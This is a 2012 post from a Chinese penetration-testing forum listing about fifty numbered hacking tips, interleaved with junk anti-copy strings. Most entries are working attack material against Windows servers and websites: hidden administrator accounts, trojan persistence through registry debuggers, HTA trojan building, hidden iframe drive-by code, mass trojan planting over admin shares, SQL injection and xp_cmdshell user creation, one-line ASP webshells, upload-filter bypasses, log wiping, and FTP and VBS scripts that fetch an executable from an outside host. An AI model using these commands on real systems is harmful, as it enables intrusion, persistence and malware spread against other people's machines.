中国网络渗透测试联盟
标题:
一些笔记
[打印本页]
作者:
admin
时间:
2012-9-15 14:51
标题:
一些笔记
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
8 N" n& R0 b+ k. ~+ o0 }6 I
cacls C:\windows\system32 /G hqw20:R
# |1 F4 k, h8 `# p E: d' v
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
) p& Z" _$ G* o7 |( @& _
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
- @4 W; @" m5 d4 X! J" a3 t
9 t5 A, A' Z+ U, u8 Z$ y! j
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
# c* E+ I+ M2 b" O& ~7 H3 j0 M/ h2 R
4 e9 F8 q0 Q B1 A4 e E
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
$ O. s7 h# O- \ {
: w( | x; T% h8 a# T" P8 \: S2 \
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
7 ?; Y" f3 R9 f. r
3 m: I" S$ ^: P& j6 S
5、利用INF文件来修改注册表
/ f- X3 |( T4 F
[Version]
1 k2 L! Z, H) Y: W2 I* a
Signature="$CHICAGO$"
4 ^; {$ f8 j+ w2 k* k) f" x
[Defaultinstall]
9 |1 r- j: f& k7 t0 f
addREG=Ating
( b( t2 {! E/ _) v+ t+ ^& u
[Ating]
6 @& O7 b1 p' I$ X9 C5 u
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
$ l$ j6 R% C5 l) ?7 |% Z
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
; A7 e& L# d! _0 I! B0 c5 Z; R2 C
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
" u$ R' c. G' h. E F1 F* q% {$ }* C
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
5 Y9 O* l- Y4 ]% K3 t# j" J- J H- ?. F2 J
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
% A/ [. c$ y' \% }" K
HKEY_CURRENT_CONFIG 简写为 HKCC
3 F. T& W! t- S2 _# h
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
5 P" V0 P' f% F; W9 z
"1"这里代表是写入或删除注册表键值中的具体数据
" s/ J: V P; F% ^) F
. W. l. J; J$ k2 W3 ~
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
- a* F0 m- s% g1 S
多了一步就是在防火墙里添加个端口,然后导出其键值
3 o- Z L: H# i
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
( Q1 j3 L0 N0 {8 _( ]' ]" c
" L% H% o" F, f6 E/ `
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
' Y2 Z& F1 A% M# s1 c. L3 i
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
* F6 E6 L7 E7 W8 e/ |: p7 \: o
8 x$ |' m, {: }2 `/ a* ^" e2 P& U7 l
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
9 C! I) C3 s" T# Y9 y' a8 J
3 q$ W, ?2 E( d7 v1 \, f& s6 T
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
" m$ {% n% E1 u1 K. B$ }4 F
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
8 J4 b& O: q) V4 E
' i% y+ d( F2 v5 X
10、用google帮我们找网站后台,搜索”filetype:asp site:
www.hack6.com
inurl:login”
5 V9 }" K6 E" Y8 m! t9 H/ I1 F/ N
- r1 O, u9 @; z) ~; m' @! v( P
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
4 D& c; k$ R# _ X, D
用法:xsniff –pass –hide –log pass.txt
2 r# {( R4 r. o8 R& E9 W
) o* r1 x0 Q9 J, t# x& R
12、google搜索的艺术
/ S2 @: c: v5 \( r' q
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
( ^; I8 ^3 t. C! w) N
或“字符串的语法错误”可以找到很多sql注入漏洞。
* \8 f7 v. J0 y/ c" j9 K
/ ~7 c/ X4 h7 }- h' c7 ?
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
' M% x @; d! O, Q( ~
5 V% T7 v; b' d0 h1 A" b/ n$ ?' \
14、cmd中输入 nc –vv –l –p 1987
! E/ H. i6 U: J" W' B3 ?5 E" O
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
3 N d. m" O, h$ Y. }8 H9 D
" c z& Z( l7 x" F4 \$ i% U: C# ~
15、制作T++木马,先写个ating.hta文件,内容为
0 ]5 `1 Q8 p" b, ]- e$ {" O; B# q- H
<script language="VBScript">
' |) {; t: X4 P/ I
set wshshell=createobject ("wscript.shell" )
6 W0 O" \5 e' R3 ^
a=wshshell.run("你马的名称",1)
6 n9 b5 x* E0 `/ l8 i( r4 @6 j
window.close
6 x6 f9 ^8 J2 g3 j
</script>
, _$ O0 @' p4 E5 }" s, V$ Z
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
7 @- V, w. }1 v! ~0 x3 a* d
# j6 U; X0 C/ k# _
16、搜索栏里输入
9 C6 Y9 v& `1 J \3 f* z; ^
关键字%'and 1=1 and '%'='
% J a9 d( V, Y" o& B
关键字%'and 1=2 and '%'='
6 ~! p& t+ C. v$ {4 e+ \/ m
比较不同处 可以作为注入的特征字符
J! `6 y7 u0 i1 g* E7 ]' U5 u
( a4 E4 n5 I. ~7 Z' n
17、挂马代码<html>
2 V5 v- t2 Z% A2 G* ^1 c+ M. n
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
/ _. Z2 }' x+ f2 q6 N) J. b
</html>
- q" i7 R# s8 @2 b1 Z
5 J/ _0 W0 {1 [3 ]; l
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
P5 b1 m& q4 _# `1 S
net localgroup administrators还是可以看出Guest是管理员来。
# M* B, F/ F- t( a% a( X
( U5 H0 d, I j# j+ k/ V8 ^% u
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
5 M) I8 I# ^& F" w9 @
用法: 安装: instsrv.exe 服务名称 路径
4 I9 A0 X/ T3 T
卸载: instsrv.exe 服务名称 REMOVE
1 \, Z) H1 _, u$ N. W2 ` h3 h
. b9 m4 a( X, e( s
9 y( G9 @* o6 P* W; P# _
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
v$ E5 u/ Z9 i5 M5 W9 p% C, ^
不能注入时要第一时间想到%5c暴库。
+ G- [* M7 W" ^+ Y" U) t
& G% {& I: p* |- D( \6 f! B4 K* f0 D5 c% a
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
' E J- ^4 H. n' r
/ [9 P3 n* Q; Y ^
23、缺少xp_cmdshell时
2 t+ a$ y+ r. z: s" C3 f. {
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
1 D' v& j- f5 c. O
假如恢复不成功,可以尝试直接加用户(针对开3389的)
1 P# B/ G* R* P* I1 E3 {5 {" {& Z
declare @o int
& C3 ^; b" u) [5 S7 n1 e6 z( ^$ n
exec sp_oacreate 'wscript.shell',@o out
6 w8 s( v! x# K6 |6 [4 _. E/ [, G. J/ v
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
) x# f$ l3 c% w0 i6 O N5 i
4 E% k3 s( ^) H- \/ g8 e, g' t1 N' d+ l! ?
24.批量种植木马.bat
$ T* f3 p" {# u7 ?5 t) P8 ?
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
- ]5 m) i5 X6 t: M! G; F# x. ` m) L1 Y
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
: M/ y/ Z' J, n5 `! S8 w
扫描地址.txt里每个主机名一行 用\\开头
, E5 e+ ~! ^6 q
; p' f4 N0 X* |7 s. d
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
4 I5 H/ I) P( M( a1 r4 B
7 Z4 [0 L' U) i7 r: Y4 Y0 u" A. l
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
% J4 f: w1 N2 e, E% g/ w0 k0 r' X
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
, [. I7 T+ R: a( g7 [2 k0 N
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
6 C5 c% Q7 c" _- A/ t8 C: O0 w
% ?" G# ^3 K: q' P! a
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
5 M, s+ a4 n2 b
然后用#clear logg和#clear line vty *删除日志
) M. ~+ k! d% ?# u
! x/ h* ~9 F) @8 V% Y' h
28、电脑坏了省去重新安装系统的方法
$ @% B2 ~% t6 ^' N
纯dos下执行,
: V0 `# R( t o4 [$ ]1 D
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
6 d5 R, B* W$ U% i- D5 T$ g
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
1 K5 S, q( R% w) l1 T/ Q% t
" E# w) p0 M% \5 V- B5 ] s
29、解决TCP/IP筛选 在注册表里有三处,分别是:
" z* y) A) ]1 y! B
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
& A3 F, B2 T% D: X
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
5 G; a9 y. L0 t! n# [; W
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
2 ?) z0 e0 G0 f" l' X: i
分别用
) z- T$ H- x) j+ w, i0 f# _3 j
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
% @& H% Z$ }+ |+ i" h3 j% {6 l5 _
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
+ n }$ _" B6 z/ F
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
+ }$ \; M9 F8 h& v0 Y+ _
命令来导出注册表项
& N& l2 Y ?: @$ f3 X1 |; |
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
3 K8 `2 G0 E" t! Y) _/ r. _! y
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
: s, D; e3 I! Y4 I; z- \1 B
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
; Q3 e Q' u! q" U( m7 L- Q
2 }% l9 V( e1 [ Q, B2 P
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
# D5 o4 R) D1 d7 e4 G# a1 L
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
) S. V$ s: D% I9 Z1 W
{$ S3 N$ x) R1 q) ~& o' T" Y# |
31、全手工打造开3389工具
- T- M* z( K: H" z, \
打开记事本,编辑内容如下:
6 E5 @% D) X; I; F& g/ l
echo [Components] > c:\sql
- \ h6 J: F D& _
echo TSEnable = on >> c:\sql
. j+ i8 a3 k4 [7 e; Y
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
' _/ D, M! p% Q7 b' T
编辑好后存为BAT文件,上传至肉鸡,执行
( R# L$ T+ K' n
) V! ?: r8 U& W6 k/ ?8 r
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
3 ^, h u \8 e7 m& o- z
' x6 P" D- e% E7 n5 t
33、让服务器重启
6 t; j/ v! N& g0 x5 h8 g6 n
写个bat死循环:
- x1 d; I+ z i0 i+ ]: i3 ^
@echo off
6 G4 I/ ?2 [7 W7 p& Y
:loop1
+ p, _1 U) m2 E* \# @5 E8 z
cls
" J: Z B, N8 G! l# I- F. [; w
start cmd.exe
0 M# |( Z4 H4 g( S- z0 _7 {
goto loop1
; c7 X( D, g. p9 [1 A E
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
2 K( {0 M1 d/ K
s% y0 G, ?5 n1 @/ t# }9 K
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
: t0 ]) p! C+ a% V
@echo off
; ~& A) H5 F. D+ }& @* u1 |
date /t >c:/3389.txt
$ |2 s9 R# B/ A
time /t >>c:/3389.txt
$ @2 T/ u: A8 l% {5 o$ \
attrib +s +h c:/3389.bat
" Q0 n% G0 B+ t5 F0 [3 Z
attrib +s +h c:/3389.txt
4 U7 R9 D! U N
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
* ?9 H% u/ S( b+ L7 c% M" ~3 C2 ^0 N
并保存为3389.bat
1 a* a6 s9 ]1 o, d* D
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
. M. G' f8 A6 ~' f) k
g, n9 X6 l/ ~, J) d
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
, V) H& w+ C- u, m6 @
start
http://www.hack520.org/muma.htm
然后点执行。(muma.htm是你上传好的漏洞网页)
& Z& B" I* S: @1 R" v+ M: K/ L0 W
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
( S2 `) K- P' F0 C$ i* @1 m2 O
8 Q, o. @6 n( a+ @: R, W; A
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
/ _& \) k% R; E, h! L
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
. u/ s1 m( S( F$ _' K$ u. D2 _
echo 你的FTP账号 >>c:\1.bat //输入账号
( ]- T e; b; [" X) ]* v
echo 你的FTP密码 >>c:\1.bat //输入密码
& ?) c5 o0 O* W6 U& m, b
echo bin >>c:\1.bat //登入
$ [. p/ }8 I# p( ^- r! n
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
9 P4 ^ e" C5 [; c
echo bye >>c:\1.bat //退出
5 S+ h F! y; m* T( g n9 c
然后执行ftp -s:c:\1.bat即可
$ n1 q6 G* O; N* y, X% c# e$ }
) ~; v* \# Q5 [5 c4 X6 S
37、修改注册表开3389两法
& |8 l4 w$ y. L% V B b1 o
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
i0 Z& f1 r% n6 L' G7 L$ O7 }
echo Windows Registry Editor Version 5.00 >>3389.reg
) L% ]% Z5 F9 F4 _* e
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
& ]! l! T' j( w+ f
echo "Enabled"="0" >>3389.reg
- G5 ]+ S! d3 ~1 a: ~
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
9 e- |% @7 ~7 x+ X: r' z
NT\CurrentVersion\Winlogon] >>3389.reg
+ P k) ]( p' m1 S5 p) \" C
echo "ShutdownWithoutLogon"="0" >>3389.reg
4 n# n* |. Q* j3 H- S8 n
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
' o' ]0 j! r' ?6 U* s
>>3389.reg
/ O$ Q' v- w% B, _& E; x0 j# E. B
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
& Q* Q2 a4 |/ Q* A( M( \% j: g
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
7 b% N+ U0 ~$ N. ~
>>3389.reg
6 t8 C4 \+ s) [7 G, f
echo "TSEnabled"=dword:00000001 >>3389.reg
, }! z2 F, o2 I
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
. v9 U3 m$ w/ W9 |3 o( F2 K
echo "Start"=dword:00000002 >>3389.reg
: \ q, G! q: P. o: `% A+ {
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
: G5 h; g2 K' I5 {* @" x: b* R
>>3389.reg
B( n- E' x4 Z- {' _
echo "Start"=dword:00000002 >>3389.reg
& y+ d; m2 c$ B
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
/ I7 h2 J, N* Z
echo "Hotkey"="1" >>3389.reg
; A( @/ u8 P. c
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
; Q4 L; {- y0 w5 L0 I
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
' c0 ]: S2 [# D8 J, u* J
echo "PortNumber"=dword:00000D3D >>3389.reg
' r+ w' U) `8 G# L6 w' H9 N; L
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
# l+ a w7 a$ R. E( U
Server\WinStations\RDP-Tcp] >>3389.reg
1 P4 ~' ], Z$ X3 O
echo "PortNumber"=dword:00000D3D >>3389.reg
) J, z; k2 [. _; w' z, d
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
% \# o$ A3 W5 k/ a
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
! X7 @1 [# n% S( [7 [. ^7 g
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
, Y% H) z; x4 @. i8 `
(2)winxp和win2003终端开启
0 m l& ~* D2 e
用以下ECHO代码写一个REG文件:
& z; D- H% {0 F" O6 z
echo Windows Registry Editor Version 5.00>>3389.reg
7 s5 n3 ?% c: n
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
; i( p5 B& Y7 W2 q+ O) N% B5 X
Server]>>3389.reg
8 u" S6 C9 G1 f5 g2 W {; w
echo "fDenyTSConnections"=dword:00000000>>3389.reg
# _7 @* m% I1 B5 @2 k7 }1 n$ |+ T. O
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
$ O2 b# ^6 h, D& ]% I- @; Q' y
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
1 m( z: q' R$ V8 c. W
echo "PortNumber"=dword:00000d3d>>3389.reg
3 e; E+ k6 e( y6 S2 m
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
- n2 T4 y* _! Q" @5 f
Server\WinStations\RDP-Tcp]>>3389.reg
; O9 J; H0 R- d7 `4 `
echo "PortNumber"=dword:00000d3d>>3389.reg
) g* n9 e5 f- |& y* K* b* B, E
然后regedit /s 3389.reg del 3389.reg
$ i; R& o; d- V! e
XP下不论开终端还是改终端端口都不需重启
2 a T# P Z$ K+ C, V4 D% Q$ k! {
+ S; s$ b6 g6 X, \; J
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
% `) L* }5 f" l0 \
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
6 {' L/ `* s# E4 {
( I- h m5 @+ g. C* O. @2 a
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
0 V. [, |/ _3 P9 [. C
(1)数据库文件名应复杂并要有特殊字符
! P( s1 S; L9 ]. D: ?
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
( K2 X0 ?3 g H
将conn.asp文档中的
2 N4 O! P6 M7 l4 l4 e: h
DBPath = Server.MapPath("数据库.mdb")
3 m" o, _6 Z% h; |; z; g; z8 C' r
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
6 V; R1 u+ Y: B; ~! R9 y& ]2 d. [
: W5 C3 j* Y! q6 }! y7 }9 m* g& t7 o
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
& q9 ~2 J( K! e, y4 p7 H3 Z+ u: U! h, ^
(3)不放在WEB目录里
: `3 O! @" T$ w" }* U5 m- c
4 N x6 }" C1 ^1 L8 z
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
+ |* x) W& Y. Q' f S
可以写两个bat文件
x+ P6 _$ }2 f! R6 p. M
@echo off
h v! k% L. N! O, b: W7 R
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
Z& ~: k* P' @- v! a0 p# O+ g
@del c:\winnt\system32\query.exe
5 s! K0 J) Z( ?0 M8 Z8 Q$ \1 x+ }
@del %SYSTEMROOT%\system32\dllcache\query.exe
6 Q3 Y; Q9 t! t
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
2 o5 K" _2 E$ a' q
5 i4 a: P# y# p4 }
@echo off
6 R9 L& N4 u7 [; F1 ]7 N
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
% _% ^1 R) X. a6 i: L
@del c:\winnt\system32\tsadmin.exe
* x& I5 [' Q4 k5 h& A7 L
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
9 `( v i# v0 N- E( z$ e: j9 e1 Q8 n3 T
) T2 @: ^6 q' h1 _' S& I( G
41、映射对方盘符
0 j: {+ k8 ]$ ~+ O: _
telnet到他的机器上,
6 p6 P: v* w* o5 t j
net share 查看有没有默认共享 如果没有,那么就接着运行
, G. w: m q2 R8 B6 |% U1 K' D
net share c$=c:
: T7 x* |$ {% Y) T! L7 {: e f2 @
net share现在有c$
7 p1 @, r6 y$ r1 I( q: H* F
在自己的机器上运行
/ r" X1 g8 H2 @
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
+ F5 }9 M& O/ ?# c' h6 `/ p; V
9 G: p t1 n( x
42、一些很有用的老知识
4 V1 ^' f6 G/ _
type c:\boot.ini ( 查看系统版本 )
. z6 K# n) h" E1 ~/ o: ^
net start (查看已经启动的服务)
K- e+ f3 r6 _6 ^2 @
query user ( 查看当前终端连接 )
2 N7 g: _! D$ Q8 ~& a1 O0 B
net user ( 查看当前用户 )
8 C6 V; E r' S% u
net user 用户 密码/add ( 建立账号 )
8 p% q# q9 k# |5 Q/ ?9 P
net localgroup administrators 用户 /add (提升某用户为管理员)
" w* L0 a! D: S" @5 S. Y
ipconfig -all ( 查看IP什么的 )
, i" l' i ~ \% ^4 Y* D8 P$ s- s- Z: f
netstat -an ( 查看当前网络状态 )
& U4 \2 S1 ^3 X/ U2 y0 B+ c' Q5 f
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
, m+ q; s3 ?2 c2 |
克隆时Administrator对应1F4
" X. F M+ L0 r( Q# @
guest对应1F5
" F' s3 z: Z# u6 d/ {! p2 z
tsinternetuser对应3E8
9 |" Y, N3 E' d' A* x5 Y) m5 H
7 S0 `/ o% y" L( J
43、如果对方没开3389,但是装了Remote Administrator Service
9 u, P) R, T- ]; X3 U
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
2 j5 i' Q z( {$ U3 F. H" i
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
% a0 ]8 ?6 |3 c
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
# R1 b9 D; I8 W& v3 a4 O
; E! a8 [+ z3 h9 w4 ^% n
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
5 }2 U, ]0 Z; b% D
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
4 N8 S- N* N5 A5 }; W
/ o% Q$ Z6 d1 g3 c; G2 }! n
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
/ N3 g. i! v! q0 j
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
, a; X; Q" t! Q5 m+ C
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
7 h2 ?) T2 n- A8 ~1 c& ]
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
' `3 q8 k Y: S, r8 z5 M3 r
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
. q7 G5 s$ c8 H0 J
(这是完整的一句话,其中没有换行符)
, P0 F, M; r, W1 K
然后下载:
3 P% t/ Q$ N i6 h: e
cscript down.vbs
http://www.hack520.org/hack.exe
hack.exe
2 i, d) z& I6 ~" [8 A
$ }3 Q' s+ {, [8 C; j4 D( _4 {
46、一句话木马成功依赖于两个条件:
9 ^) ]+ {6 ?7 ~. ]
1、服务端没有禁止adodb.Stream或FSO组件
! s, C2 `& P; [- W% t) L# W3 _
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
9 n$ [$ K7 c1 z( X- r
u- P0 ?. \+ v* V. i
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
, R9 k$ o1 \$ I. V. c4 Y/ c- i
;alter database utsz set RECOVERY FULL--
! J: {% z3 O ?
;create table cmd (a image)--
. o' c- |: e/ g9 u
;backup log utsz to disk = 'D:\cmd' with init--
: `7 v3 }- a' b8 n
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
4 P4 W, i, h8 }) j7 W8 M
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
! L$ q6 Q5 s. N* L, z8 a
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
2 p1 v2 A I2 ?+ ]! e
! p( X3 i' i% x$ G% D2 d6 b
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
5 S4 g- b8 m5 D2 p: L( p6 Y" k
2 q% G& \$ @1 i. m
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
9 W& A2 j7 K0 t
所有会话用 'all'。
2 i8 k, @* p/ C
-s sessionid 列出会话的信息。
0 i$ c% E' G& \* R' I
-k sessionid 终止会话。
$ N- a6 G( Q% o6 _ z# Z/ J
-m sessionid 发送消息到会话。
$ o( Q7 ^, R/ h; _
( x# K# H. V. Y$ J
config 配置 telnet 服务器参数。
& w/ e1 O2 T0 H5 v
3 a) ?+ o9 c. U0 j
common_options 为:
: N' E4 Z9 \# [4 n
-u user 指定要使用其凭据的用户
: h j4 N( @1 E& e, G; A# S
-p password 用户密码
0 N2 p1 @: {% r6 S+ }( {/ B# |
" g% t8 H( _- [2 X" v9 V1 u% R& ~9 @
config_options 为:
3 d2 U' o4 N9 b( H
dom = domain 设定用户的默认域
1 A! e, n7 t! W' P6 I
ctrlakeymap = yes|no 设定 ALT 键的映射
: G' {; s2 Q; T6 ?+ o, f
timeout = hh:mm:ss 设定空闲会话超时值
4 o; d* C8 d. I: ^4 Z0 G6 O3 ?
timeoutactive = yes|no 启用空闲会话。
; }5 }/ d4 b# j2 [6 S0 O
maxfail = attempts 设定断开前失败的登录企图数。
^. W9 r k) @' }" Z
maxconn = connections 设定最大连接数。
, V* Q1 h) r) O4 d1 Y) h' x# I
port = number 设定 telnet 端口。
: p S$ _. u* Y8 |( ?( v0 \. |. z
sec = [+/-]NTLM [+/-]passwd
* r) U, H/ U2 o6 _7 s* ~8 d
设定身份验证机构
+ ~' E8 t6 p6 t, X- `
fname = file 指定审计文件名。
+ g# X& ~7 s! W+ T" w0 B) f" H
fsize = size 指定审计文件的最大尺寸(MB)。
) r9 r* u: p5 [) ^$ |+ c* i2 h
mode = console|stream 指定操作模式。
& a" ?9 f% r8 W4 t6 e1 q: E
auditlocation = eventlog|file|both
" w# T) m2 R' L; `* U* } q" @6 J. k9 v
指定记录地点
& L1 I# t( f; W( L, P
audit = [+/-]user [+/-]fail [+/-]admin
$ s: O3 _" Z8 O& _( j/ \2 ~$ s2 X
& m' q" S7 W g" |6 q) G7 T
49、例如:在IE上访问:
5 d2 Z9 o5 f4 Z8 m% y) w5 N* W" Z
www.hack520.org/hack.txt
就会跳转到
http://www.hack520.org/
" R+ Q( M3 k; S3 v9 _" t& I4 \
hack.txt里面的代码是:
. b% x% N! A( B. {
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
: R* k) i3 S8 E; b
把这个hack.txt发到你空间就可以了!
, P4 ?1 P2 [5 P0 h' Z
这个可以利用来做网马哦!
! a) M2 ]- I: P/ m: I
* J4 p8 g, k0 Q5 ^( u0 U7 T4 Y' T) j
